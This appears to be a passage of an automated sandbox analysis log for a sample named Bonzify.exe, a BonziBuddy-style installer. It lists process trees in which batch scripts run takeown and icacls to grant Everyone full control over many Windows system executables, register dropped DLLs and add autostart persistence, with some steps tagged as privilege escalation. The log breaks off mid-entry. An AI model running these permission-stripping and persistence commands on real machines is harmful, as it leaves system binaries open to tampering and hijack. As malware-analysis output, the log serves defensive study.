C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.1_none_1f070c37a19029ff\powershell.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\f\powershell.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\f\powershell.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\f\powershell.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\powershell.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\powershell.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\powershell.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\r\powershell.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\r\powershell.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_470f45b46101edfb\r\powershell.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printdialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_3b03b28c788655c6\PrintDialog.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printdialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_3b03b28c788655c6\PrintDialog.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printdialog.appxmain_31bf3856ad364e35_10.0.19041.1_none_3b03b28c788655c6\PrintDialog.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-eduprintprov_31bf3856ad364e35_10.0.19041.1_none_67326312c2487423\EduPrintProv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-eduprintprov_31bf3856ad364e35_10.0.19041.1_none_67326312c2487423\EduPrintProv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-eduprintprov_31bf3856ad364e35_10.0.19041.1_none_67326312c2487423\EduPrintProv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\splwow64.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\splwow64.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\splwow64.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\spoolsv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\spoolsv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\f\spoolsv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\splwow64.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\splwow64.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\splwow64.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\spoolsv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\spoolsv.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\r\spoolsv.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\splwow64.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\splwow64.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\splwow64.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\spoolsv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\spoolsv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\spoolsv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\splwow64.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\splwow64.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\splwow64.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\spoolsv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\spoolsv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1_none_8c3cb0a560e64b91\spoolsv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.19041.1_none_60c397ff12ee4db1\w3wp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.19041.1_none_60c397ff12ee4db1\w3wp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-processmodel-cpt_31bf3856ad364e35_10.0.19041.1_none_60c397ff12ee4db1\w3wp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-proquota_31bf3856ad364e35_10.0.19041.1_none_ddb8055b31c2ae64\proquota.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-proquota_31bf3856ad364e35_10.0.19041.1_none_ddb8055b31c2ae64\proquota.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-proquota_31bf3856ad364e35_10.0.19041.1_none_ddb8055b31c2ae64\proquota.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\f\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\f\provtool.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\f\provtool.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\provtool.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\provtool.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\r\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\r\provtool.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.153_none_95ba73d08e5f739c\r\provtool.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\f\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\f\provtool.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\f\provtool.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\provtool.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\provtool.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\r\provtool.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\r\provtool.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.19041.844_none_95c651508e565d13\r\provtool.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.19041.1_none_20798db5235046f8\provlaunch.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.19041.1_none_20798db5235046f8\provlaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\amd64_microsoft-windows-provisioning-platform_31bf3856ad364e35_10.0.19041.1_none_20798db5235046f8\provlaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\msagent\AgentSvr.exeC:\Windows\msagent\AgentSvr.exe -Embedding1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\Bonzify.exe"C:\Users\Admin\Downloads\Bonzify.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\KillAgent.bat"2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AgentSvr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exetakeown /r /d y /f C:\Windows\MsAgent3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\MsAgent /c /t /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_MSIL\ComSvcConfig\3.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_MSIL\dfsvc\2.0.0.0__b03f5f7f11d50a3a\dfsvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentCtl.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDPv.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\mslwvtts.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDP2.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentMPx.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentSR.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentPsh.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\msagent\AgentSvr.exe"C:\Windows\msagent\AgentSvr.exe" /regserver3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_MSIL\SMSvcHost\3.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_MSIL\SMSvcHost\3.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_MSIL\SMSvcHost\3.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\assembly\GAC_MSIL\WsatConfig\3.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\assembly\GAC_MSIL\WsatConfig\3.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\assembly\GAC_MSIL\WsatConfig\3.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\bfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\bfsvc.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\bfsvc.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Boot\PCAT\memtest.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Boot\PCAT\memtest.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Boot\PCAT\memtest.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\explorer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\explorer.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\HelpPane.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\HelpPane.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\HelpPane.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\hh.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\hh.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\hh.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\ImmersiveControlPanel\SystemSettings.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\ImmersiveControlPanel\SystemSettings.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe"2⤵
-
